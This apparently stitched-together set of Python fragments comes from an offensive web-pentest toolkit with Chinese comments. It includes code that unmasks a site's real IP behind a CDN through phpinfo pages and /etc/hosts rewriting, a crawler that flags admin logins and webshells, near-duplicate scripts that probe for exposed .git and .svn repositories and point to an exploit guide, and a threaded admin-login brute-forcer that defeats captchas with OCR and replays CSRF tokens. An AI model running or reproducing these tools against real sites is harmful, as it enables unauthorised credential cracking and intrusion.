def __init__(self, domain): #必须保证连上了vpn,要在可以ping通google的条件下使用本工具,否则有些domain由于被GFW拦截无法正常访问会导致 #本工具判断错误,checkvpn在可以ping通google的条件下返回1 while 1: if checkvpn() == 1: break else: time.sleep(1) print("vpn is off,connect vpn first") if domain[:4] == "http": print( "domain format error,make sure domain has no http,like www.baidu.com but not \ http://www.baidu.com") sys.exit(0) #首先保证hosts文件中没有与domain相关的项,有则删除相关 domainPattern = domain.replace(".", "\.") #下面的sed的正则中不能有\n,sed匹配\n比较特殊 #http://stackoverflow.com/questions/1251999/how-can-i-replace-a-newline-n-using-sed command = "sudo sed -ri 's/.*\s+%s//' /etc/hosts" % domainPattern os.system(command) self.domain = domain self.http_or_https = get_http_or_https(self.domain) print('domain的http或https是:%s' % self.http_or_https) result = get_request(self.http_or_https + "://" + self.domain, 'seleniumPhantomJS') self.domain_title = result['title'] #下面调用相当于main函数的get_actual_ip_from_domain函数 actual_ip = self.get_actual_ip_from_domain() if actual_ip != 0: print("恭喜,%s的真实ip是%s" % (self.domain, actual_ip)) #下面用来存放关键返回值 self.return_value = actual_ip
def get_domain_actual_ip_from_phpinfo(self): # 从phpinfo页面尝试获得真实ip CLIOutput().good_print("现在尝试从domain:%s可能存在的phpinfo页面获取真实ip" % self.domain) phpinfo_page_list = ["info.php", "phpinfo.php", "test.php", "l.php"] for each in phpinfo_page_list: url = self.http_or_https + "://" + self.domain + "/" + each CLIOutput().good_print("现在访问%s" % url) visit = get_request(url,'seleniumPhantomJS') code = visit['code'] content = visit['content'] pattern = re.compile(r"remote_addr", re.I) if code == 200 and re.search(pattern, content): print(each) actual_ip = re.search(r"REMOTE_ADDR[^\.\d]+([\d\.]{7,15})[^\.\d]+", content).group(1) return actual_ip # return 0代表没有通过phpinfo页面得到真实ip return 0
def check_if_ip_is_actual_ip_of_domain(self,ip): # 通过修改hosts文件检测ip是否是domain对应的真实ip # 如果是则返回True,否则返回False #CLIOutput().good_print("现在通过修改hosts文件并刷新dns的方法检测ip:%s是否是domain:%s的真实ip" % (ip,self.domain)) #python通过requests库或mechanicalsoup库或selenium_phantomjs来请求时不会被dns缓存影响,只会被hosts文件影响dns解析,人工用浏览器访问域名则会受dns缓存影响 CLIOutput().good_print("现在通过修改hosts文件的方法检测ip:%s是否是domain:%s的真实ip" % (ip,self.domain)) os.system("cp /etc/hosts /etc/hosts.bak") self.modify_hosts_file_with_ip_and_domain(ip) #python通过requests库或mechanicalsoup库或selenium_phantomjs来请求时不会被dns缓存影响,只会被hosts文件影响dns解析,人工用浏览器访问域名则会受dns缓存影响 #self.flush_dns() hosts_changed_domain_title= get_request(self.http_or_https + "://%s" % self.domain,'selenium_phantom_js')['title'] os.system("rm /etc/hosts && mv /etc/hosts.bak /etc/hosts") #这里要用title判断,html判断不可以,title相同则认为相同 if self.domain_title == hosts_changed_domain_title: CLIOutput().good_print("检测到真实ip!!!!!!",'red') return True else: CLIOutput().good_print("当前ip不是域名的真实ip",'yellow') return False
def get_form_data_post_info(url, cookie): # 获取通过multipart_form_data上传文件的信息 # return_value['form_data_dict']为multipart form data中的非文件参数字典 # return_value['form_file_param_name']为multipart form data中的文件参数名 form_data_dict = {} form_file_param_name = '' origin_html = '' return_value = {'form_data_dict': form_data_dict, 'form_file_param_name': form_file_param_name, 'origin_html': origin_html} rsp = get_request(url, cookie=cookie) origin_html = rsp['content'] origin_html = re.sub(r"<!--.*-->", "", origin_html) has_file = re.search( r'''<input .*type=('|")?file('|")?.*>''', origin_html, re.I) has_form = re.search(r"<form\s+", origin_html, re.I) if not has_file: print("Sorry,I can't find any `file` element,the url has no upload function.If you are sure it has an upload function, you can continue to test by supplying the `-r` parameter") sys.exit(0) elif not has_form: print("Sorry,I can't find any `form` element,but find a `file` element,you need to provide the `-r` parameter to specify a file whose contents are upload request packet") sys.exit(0) if not re.search(r"<form\s+", origin_html, re.I): print("Sorry,I can't find any form.") sys.exit(0) param_part = get_param_part_from_content(origin_html) param_list = param_part.split("&") for param_and_value in param_list: _ = param_and_value.split("=") param = _[0] value = _[1] if value != "filevalue": # 非文件参数 form_data_dict[param] = value else: # 文件参数 form_file_param_name = param return_value['form_data_dict'] = form_data_dict return_value['form_file_param_name'] = form_file_param_name return_value['origin_html'] = origin_html return return_value
def check_if_ip_is_actual_ip_of_domain(self, ip): # 通过修改hosts文件检测ip是否是domain对应的真实ip # 如果是则返回True,否则返回False CLIOutput().good_print( "现在通过修改hosts文件并刷新dns的方法检测ip:%s是否是domain:%s的真实ip" % (ip, self.domain)) os.system("cp /etc/hosts /etc/hosts.bak") self.modify_hosts_file_with_ip_and_domain(ip) self.flush_dns() hosts_changed_domain_title = get_request( self.http_or_https + "://%s" % self.domain, 'seleniumPhantomJS')['title'] os.system("rm /etc/hosts && mv /etc/hosts.bak /etc/hosts") #这里要用title判断,html判断不可以,title相同则认为相同 if self.domain_title == hosts_changed_domain_title: print("是的!!!!!!!!!!!!") return True else: print("不是的!!!!!!!!!!!!") return False
def parse_get(self, response): #input(44444444444444) item = CrawlerItem() item['code'] = response.status item['current_url'] = response.url #print(response.url) #input(5555555555555) #print(response.data) #input(3333333333) #if response.url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # print('fail ....................') #if response.url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/index.php": # print('succeed .................') item['resources_file_list'] = [] item['sub_domains_list'] = [] item['like_admin_login_url'] = False item['like_webshell_url'] = False #print(response.text) if response.status == 200: urls = collect_urls_from_html(response.text, response.url) title_list = response.xpath('//title/text()').extract() item['title'] = None if len(title_list) == 0 else title_list[0] item['content'] = response.text else: a = get_request(response.url, cookie=self.cookie) item['title'] = a['title'] item['content'] = a['content'] urls = collect_urls_from_html(a['content'], response.url) #ttt=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=" #if ttt in urls: # print(response.url) # input(333333333333333333) if like_admin_login_content(item['content']): item['like_admin_login_url'] == True if check_url_has_webshell_content(item['current_url'], item['content'], item['code'], item['title'])['y1']: item['like_webshell_url'] == True yield item url_main_target_domain = get_url_belong_main_target_domain( self.start_url) for url in urls: #if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # input(1111111111111) url_templet_list = get_url_templet_list(url) url_http_domain = get_http_domain_from_url(url) if url_is_sub_domain_to_http_domain( url, urlparse(url)[0] + "://" + url_main_target_domain ) and url_http_domain not in item['sub_domains_list']: item['sub_domains_list'].append(url_http_domain) if urlparse(url).hostname != self.domain: continue if url in self.collected_urls: continue _flag = 0 for _ in url_templet_list: if _ in self.collected_urls: _flag = 1 break if _flag == 1: continue self.add_url_templet_to_collected_urls(url) if "^" in url: # post类型url post_url_list = url.split("^") post_url = post_url_list[0] post_data = post_url_list[1] yield SplashRequest(post_url, callback=self.parse_post, endpoint='execute', magic_response=True, meta={ 'handle_httpstatus_all': True, 'current_url': url }, args={ 'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data }) else: # get类型url #if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # input(9999999999999999) match_resource = re.match(RESOURCE_FILE_PATTERN, url) match_logoff = re.search( r"(logout)|(logoff)|(exit)|(signout)|(signoff)", url, re.I) if match_resource: item['resources_file_list'].append(url) elif match_logoff: pass else: #if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # input(8888888889999999999999) yield SplashRequest(url, self.parse_get, endpoint='execute', magic_response=True, meta={'handle_httpstatus_all': True}, args={'lua_source': self.lua_script})
import re import os import sys exp10it_module_path = os.path.expanduser("~") + "/mypypi" sys.path.insert(0, exp10it_module_path) from exp10it import get_request from exp10it import get_http_domain_from_url target = sys.argv[1] print("checking code leak vul for " + target) current_dir = os.path.split(os.path.realpath(__file__))[0] return_string = "" leak_list = [ ".hg", ".git", ".svn", ".ds_store", ".bzr", "WEB-INF/database.propertiesl", "WEB-INF/web.xml" ] for each in leak_list: http_domain = get_http_domain_from_url(target) leaked_url = http_domain + "/" + each a = get_request(leaked_url) if not re.search(r"页面不存在", a['content'], re.I) and a['code'] == 200: return_string += "%s exists!\n" % leaked_url if return_string != "": return_string += "visit http://www.hacksec.cn/Penetration-test/474.html to exploit it" with open("%s/result.txt" % current_dir, "a+") as f: f.write(return_string)
import re import os import sys exp10it_module_path = os.path.expanduser("~") + "/mypypi" sys.path.insert(0, exp10it_module_path) import sys from exp10it import get_request from exp10it import get_http_domain_from_url target = sys.argv[1] print("checking code leak vul for " + target) current_dir = os.path.split(os.path.realpath(__file__))[0] return_string = "" leakList = [ ".hg", ".git", ".svn", ".ds_store", ".bzr", "WEB-INF/database.propertiesl", "WEB-INF/web.xml" ] for each in leakList: http_domain = get_http_domain_from_url(target) leakedUrl = http_domain + "/" + each a = get_request(leakedUrl) if not re.search(r"页面不存在", a['content'], re.I) and a['code'] == 200: return_string += "%s exists!\n" % leakedUrl if return_string != "": return_string += "visit http://www.hacksec.cn/Penetration-test/474.html to exploit it" with open("%s/result.txt" % current_dir, "a+") as f: f.write(return_string)
def crack_admin_login_url( url, user_dict_file=ModulePath + "dicts/user.txt", pass_dict_file=ModulePath + "dicts/pass.txt", yanzhengma_len=0): # 这里的yanzhengma_len是要求的验证码长度,默认不设置,自动获得,根据不同情况人为设置不同值效果更好 # 爆破管理员后台登录url,尝试自动识别验证码,如果管理员登录页面没有验证码,加了任意验证码数据也可通过验证 import requests figlet2file("cracking admin login url", 0, True) print("cracking admin login url:%s" % url) print("正在使用吃奶的劲爆破登录页面...") def crack_admin_login_url_thread(url,username,password): if get_flag[0] == 1: return try_time[0] += 1 if requestAction=="GET": final_request_url=form_action_url final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" % (user_form_name,username),final_request_url) final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" % (pass_form_name,password),final_request_url) if has_yanzhengma[0]: if needOnlyGetOneYanZhengMa: yanzhengmaValue=onlyOneYanZhengMaValue else: yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src) final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" % (yanzhengma_form_name,yanzhengmaValue),final_request_url) if hasCsrfToken: final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url) html=s.get(final_request_url).text if hasCsrfToken: csrfTokenValue=get_csrf_token_value_from_html(html) currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue else: #post request paramPartValue=form_action_url.split("^")[1] paramList=paramPartValue.split("&") values={} for eachP in paramList: eachPList=eachP.split("=") eachparamName=eachPList[0] eachparamValue=eachPList[1] if eachparamName==user_form_name: eachparamValue=username if eachparamName==pass_form_name: eachparamValue=password values[eachparamName]=eachparamValue if has_yanzhengma[0]: if not needOnlyGetOneYanZhengMa: values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src) else: values[yanzhengma_form_name]=onlyOneYanZhengMaValue if hasCsrfToken: values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1) html = s.post(form_action_url.split("^")[0], values).text if hasCsrfToken: csrfTokenValue=get_csrf_token_value_from_html(html) currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue USERNAME_PASSWORD = "******" + username + ":" + \ password + ")" + (52 - len(password)) * " " # 每100次计算完成任务的平均速度 left_time = get_remain_time( start[0], biaoji_time[0], remain_time[0], 100, try_time[0], sum[0]) remain_time[0] = left_time sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) + '%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD)) sys.stdout.flush() if len(html) > logined_least_length: # 认为登录成功 get_flag[0] = 1 end = time.time() CLIOutput().good_print( "congratulations!!! admin login url cracked succeed!!!", "red") string = "cracked admin login url:%s username and password:(%s:%s)" % ( url, username, password) CLIOutput().good_print(string, "red") return_string[0]=string print("you spend time:" + str(end - start[0])) http_domain_value = get_http_domain_from_url(url) # 经验证terminate()应该只能结束当前线程,不能达到结束所有线程 table_name_list = get_target_table_name_list(http_domain_value) urls_table_name = http_domain_value.split( "/")[-1].replace(".", "_") + "_urls" return {'username': username, 'password': password} def crack_admin_login_url_inside_func(url, username, pass_dict_file): # urls和usernames是相同内容的列表 urls = [] usernames = [] # passwords是pass_dict_file文件对应的所有密码的集合的列表 passwords = [] i = 0 while 1: if os.path.exists(pass_dict_file) is False: print("please input your password dict:>", end=' ') pass_dict_file = input() if os.path.exists(pass_dict_file) is True: break else: break f = open(pass_dict_file, "r+") for each in f: urls.append(url) usernames.append(username) each = re.sub(r"(\s)$", "", each) passwords.append(each) i += 1 f.close() sum[0] = usernames_num * i if needOnlyGetOneYanZhengMa or hasCsrfToken: max_workers=1 else: max_workers=20 with futures.ThreadPoolExecutor(max_workers=max_workers) as executor: executor.map(crack_admin_login_url_thread, urls, usernames, passwords) def get_one_valid_yangzhengma_from_src(yanzhengmaUrl): # 这里不用exp10it模块中打包好的get_request和post_request来发送request请求,因为要保留session在服务器需要 #yanzhengma = get_string_from_url_or_picfile(yanzhengma_src) while 1: import shutil response = s.get(yanzhengmaUrl, stream=True) with open('img.png', 'wb') as out_file: shutil.copyfileobj(response.raw, out_file) del response yanzhengma = get_string_from_url_or_picfile("img.png") os.system("rm img.png") time.sleep(3) if re.search(r"[^a-zA-Z0-9]+", yanzhengma): # time.sleep(3) continue elif re.search(r"\s", yanzhengma): continue elif yanzhengma == "": continue else: if yanzhengma_len != 0: if len(yanzhengma) != yanzhengma_len: continue # print(yanzhengma) # print(len(yanzhengma)) break return yanzhengma a=get_request(url,by="seleniumPhantomJS") get_result = get_user_and_pass_form_from_html(a['content']) user_form_name = get_result['user_form_name'] pass_form_name = get_result['pass_form_name'] if user_form_name is None: print("user_form_name is None") return if pass_form_name is None: print("pass_form_name is None") return form_action_url = a['formActionValue'] #default request action=post requestAction="POST" if a['hasFormAction']: if "^" not in a['formActionValue']: requestAction="GET" else: print("url is not a admin login url entry") return get_flag = [0] return_string=[""] try_time = [0] sum = [0] start = [0] # 用来标记当前时间的"相对函数全局"变量 biaoji_time = [0] # 用来标记当前剩余完成时间的"相对函数全局"变量 tmp = time.time() remain_time = [tmp - tmp] # current_username_password={} has_yanzhengma = [False] find_yanzhengma = get_yanzhengma_form_and_src_from_url(url) if find_yanzhengma: yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name'] yanzhengma_src = find_yanzhengma['yanzhengma_src'] has_yanzhengma = [True] hasCsrfToken=False forCsrfToken=get_url_has_csrf_token(url) if forCsrfToken['hasCsrfToken']: hasCsrfToken=True csrfTokenName=forCsrfToken['csrfTokenName'] csrfTokenPart=csrfTokenName+"=" currentCsrfTokenPart=[""] s = requests.session() # sesssion start place sessionStart=s.get(url) unlogin_length = len(sessionStart.text) # 如果post数据后返回数据长度超过未登录时的0.5倍则认为是登录成功 logined_least_length = unlogin_length + unlogin_length / 2 if hasCsrfToken: csrf_token_value=get_csrf_token_value_from_html(sessionStart.text) currentCsrfTokenPart=[csrfTokenPart+csrf_token_value] needOnlyGetOneYanZhengMa=False if has_yanzhengma[0]: if "^" in form_action_url: #post request print(get_value_from_url(form_action_url.split("^")[0])['y1']) if get_value_from_url(form_action_url.split("^")[0])['y1']!=get_value_from_url(a['currentUrl'])['y1']: # should update yanzhengma everytime needOnlyGetOneYanZhengMa=True else: #get request if get_value_from_url(form_action_url)['y1']!=get_value_from_url(a['currentUrl'])['y1']: needOnlyGetOneYanZhengMa=True if needOnlyGetOneYanZhengMa: print("Congratulation! Target login url need only one yanzhengma!!") import shutil response = s.get(yanzhengma_src, stream=True) with open('img.png', 'wb') as out_file: shutil.copyfileobj(response.raw, out_file) del response onlyOneYanZhengMaValue= input("Please open img.png and input the yanzhengma string:>") #get_string_from_url_or_picfile("img.png") os.system("rm img.png") with open(r"%s" % user_dict_file, "r+") as user_file: all_users = user_file.readlines() usernames_num = len(all_users) start[0] = time.time() for username in all_users: # 曾经双层多线程,没能跑完所有的组合,于是不再这里再开多线程 username = re.sub(r'(\s)$', '', username) crack_admin_login_url_inside_func(a['currentUrl'], username, pass_dict_file) return return_string[0]